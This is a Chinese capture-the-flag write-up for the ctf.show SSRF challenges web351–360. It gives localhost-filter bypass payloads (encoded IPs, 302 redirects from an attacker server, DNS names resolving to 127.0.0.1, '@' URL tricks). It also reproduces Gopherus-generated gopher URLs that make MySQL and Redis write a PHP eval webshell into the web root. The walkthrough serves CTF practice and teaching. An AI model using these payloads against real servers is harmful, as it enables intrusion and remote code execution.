题目地址:https://ctf.show/challenges
image-20210218155239088.png
呜呜呜,过年期间总是跑这跑那的,想做题好不容易有思路又被叫出去了。这对我这种萌新极其不友好,感觉刚会点,玩了几天回到解放前了,又啥都不会了......
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

web351

源码:

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?> 

存在一个flag.php页面,访问会返回不是本地用户的消息,那肯定是要让我们以本地用户去访问127.0.0.1/flag.php
构造payload:url=http://127.0.0.1/flag.php

web352

过滤了localhost和127.0.0
继续上题的payload还可以用
或者127.0.1 、127.1、 127.0.0.1 或者转成16进制 2进制
转进制的地址https://tool.520101.com/wangluo/jinzhizhuanhuan/

web353

用进制转换也行,或者:

十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式,还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
还有一种特殊的省略模式
127.0.0.1写成127.1
用CIDR绕过localhost
url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
payload:url=http://127.1/flag.php

web354

if($x['scheme']==='http'||$x['scheme']==='https'){
    if(!preg_match('/localhost|1|0|。/i', $url)){

302跳转,vps搭一个 :

<?php
header("Location: http://127.0.0.1/flag.php");

POST: url=http://your-domain/ssrf/302.php
Y4师傅找到一个A记录是127.0.0.1的网站: http://sudo.cc/,可以不用解析自己的了
(自己嫌麻烦,也直接用了这个)
payload:url=http://sudo.cc/flag.php

web355

设置了$host<5的限制,要求长度小于5那直接http://127.1/flag.php就可以了。
payload:url=http://127.1/flag.php

web356

绝了限制$host<3,
payload:url=http://0/flag.php
0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0

web357

利用302跳转和dns重绑定都可以。
在自己服务器上写个bit.php文件内容如下

<?php
header("Location:http://127.0.0.1/flag.php"); 

然后payload写自己的这个地址就可以了。
payload:http://xxx/bit.php
这里就讲这一种吧,另一种我也没怎么看...

web358

正则表达式的意思是以http://ctf.开头,以show结尾。
payload:url=http://ctf.@127.0.0.1/flag.php?show

web359

root@xl-bit:~/CTF/Gopherus# python gopherus.py --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

        author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: root
Give query to execute: select '<?php eval($_POST[bit]); ?>' INTO OUTFILE '/var/www/html/bit.php';          

Your gopher link is ready to do SSRF : 

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%70%61%73%73%5d%29%3b%20%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%62%69%74%2e%70%68%70%27%3b%01%00%00%00%01

-----------Made-by-SpyD3r-----------

然后传到check.php
将下划线后面的内容url编码一次。再:
post: returl=xxxxx
就将马写进去了
蚁剑连接,找到flag.txt拿到flag

web360

gopher打redis
python gopherus.py --exploit redis
第一个选PHP
里面内容:<?php eval($_POST[bit]); ?>

root@xl-bit:~/CTF/Gopherus# python gopherus.py --exploit redis


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

        author: $_SpyD3r_$


Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): php

Give web root location of server (default is /var/www/html): 
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[bit]);?>

Your gopher link is Ready to get PHP Shell: 

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2430%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bbit%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. 

-----------Made-by-SpyD3r-----------

接下来操作方法大同小异,随便找找就有flag啦

-------------------------------------SSRF篇 完结--------------------------------------------

标签: none

仅有一条评论